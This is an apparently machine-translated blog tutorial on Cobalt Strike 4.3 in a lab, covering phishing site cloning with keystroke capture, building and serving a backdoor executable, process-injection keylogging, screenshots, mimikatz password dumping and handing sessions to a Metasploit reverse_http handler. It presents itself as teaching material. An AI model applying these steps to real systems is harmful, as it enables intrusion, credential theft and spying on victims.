当前位置:网站首页>Introduction to the "penetration foundation" cobalt strike Foundation_ Cobalt strike linkage msfconsole
Introduction to the "penetration foundation" cobalt strike Foundation_ Cobalt strike linkage msfconsole
2022-06-24 04:43:00 【Ho1aAs】
List of articles
This experiment runs in a safe and isolated environment
For teaching purposes only
Environmental Science
- kali:Cobalt Strike4.3,192.168.225.129
- winxp:192.168.225.130
To configure cs
start-up cs The server
First of all cs Folder permissions
chmod -R 777 ./cobaltstrike4.3
start-up cs The server ,teamserver ip password, Custom password ,ip Fill in the public network / LAN , Can't fill in 127.0.0.1

Default port 50050
Log in to the client
sh ./start.sh
Here, the client is directly opened on the server , So you can fill in 127.0.0.1, It is better to fill in the LAN IP

Web phishing
Select clone site

Clone the target website as phishing , Check the record keyboard

The target machine accesses and enters text

The input content can be intercepted

Target penetration
establish Listener
First create a listener

add One http Monitor ,host Select client ip
Beacon For built-in Listener, obtain shell To CS On ,Foreign For external combination Listener, Commonly used in MSF The combination of

Create success

Create a back door
attack package There are four kinds.

- hta
- office macro
- Customize payload
- exe
Demonstrate options exe, Configure the corresponding listener , Then create 32 Bit exe

Save it to the desktop

If it is hta, function mshta URL that will do
The target is on line
This step simulates the victim downloading malicious exe
*python File server
Run on the desktop
python3 -m http.server 8010

Target access , Click on the run

Can trigger cs go online
cs Built in file server
Make it convenient , Select file server phishing

Select the generated back door , Then change a name 
Target access url, Click on the run

Trigger cs go online

modify sleep Time
Default 60 The second target notifies the server of the survival status , To hide yourself , And get the command to be executed once , It is necessary to shorten this time to perform penetration in order to get a good echo

Just make it smaller , Demo changed to 1s

Read directory


Process injection records keyboard input
The target opens a browser

cs Browse process

Inject explore.exe, And click the log ketstrokes Recording keyboard

After successful injection, a new process will be launched , It's the same as above Don't forget to put sleep The small

The target enters characters in the browser ,cs The keylog window receives the input character

Screenshot

Open the screenshot window to see

mimikatz Get password

Cobalt Strike linkage msfconsole
First of all to ensure cs go online

Create a foreign http Monitor ,ip Fill in the public network / LAN , Make an uncommon port

then cs The client starts msf, here ip You can fill in 127
msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit
It is equivalent to that the request of the target plane is sent to msf

Configure target generation request

choice msf The monitor for

Just a minute

Plug in installation
Use the plug-in of Tao , After decompressing load cna file 
Mail can be sent to the online machine

Reference resources
https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike
End
Welcome to follow me CSDN Blog :@Ho1aAs
Copyright belongs to :Ho1aAs
Link to this article :https://blog.csdn.net/Xxy605/article/details/125388547
Copyright notice : This article is original , When reprinted, please indicate the source and this statement
边栏推荐
- How to operate ECs and what types of system configuration schemes can be supported
- Leetcode refers to offer II 089 House theft
- Collagenase -- four types of crude collagenase from Worthington
- 提pr,push 的时候网络超时配置方法
- Beauty of script │ VBS introduction interactive practice
- External network access SVN server (external network access SVN server deployed on the cloud)
- Introduction to gradient descent method - black horse programmer machine learning handout
- Application and related research of Worthington elastase
- Worthington弹性蛋白酶的应用和相关研究
- How does the VPS server upload data? Is the VPS server free to use?
猜你喜欢

SAP MTS/ATO/MTO/ETO专题之十:ETO模式 Q+空模式 未估价库存 策略自定义

MySQL - SQL execution process

英特尔 XTU 官方超频工具已支持 Win11 22H2 和 13 代酷睿 Raptor Lake 处理器

Jointly build Euler community and share Euler ecology | join hands with Kirin software to create a digital intelligence future

微博国际版更名为微博轻享版

Idea creates a servlet and accesses the 404 message

Multi task video recommendation scheme, baidu engineers' actual combat experience sharing

Idea创建Servlet 后访问报404问题

Introduction à la méthode de descente par Gradient - document d'apprentissage automatique pour les programmeurs de chevaux noirs

Detailed explanation of tcpip protocol
随机推荐
uni-app进阶之认证【day12】
After purchasing Tencent ECs, how to solve packet loss in Internet access?
英特尔 XTU 官方超频工具已支持 Win11 22H2 和 13 代酷睿 Raptor Lake 处理器
SAP mts/ato/mto/eto topic 7: ATO mode 1 m+m mode strategy 82 (6892)
What are the advantages of ECS? Is ECS better than VM?
少儿编程课程改革后的培养方式
『渗透基础』Cobalt Strike基础使用入门_Cobalt Strike联动msfconsole
apipost接口断言详解
少儿编程教育在特定场景中的普及作用
The results of the 2022 open source summer were announced, and 449 college students will contribute to open source projects
Abnova membrane protein lipoprotein solution
阿里云新一代云计算体系架构 CIPU 到底是啥?
Real time monitoring: system and application level real-time monitoring based on flow computing Oceanus (Flink)
一文简述:供应链攻击知多少
Two most practical methods for cadence OrCAD capture to batch modify network names graphic tutorial and video demonstration
How to change the IP address of ECS? What are the precautions for changing the IP address
Jimureport building block report - expression introduction
Advanced authentication of uni app [Day12]
Summary of Android interview questions in 2020 (elementary)
2020年Android面试题汇总(初级)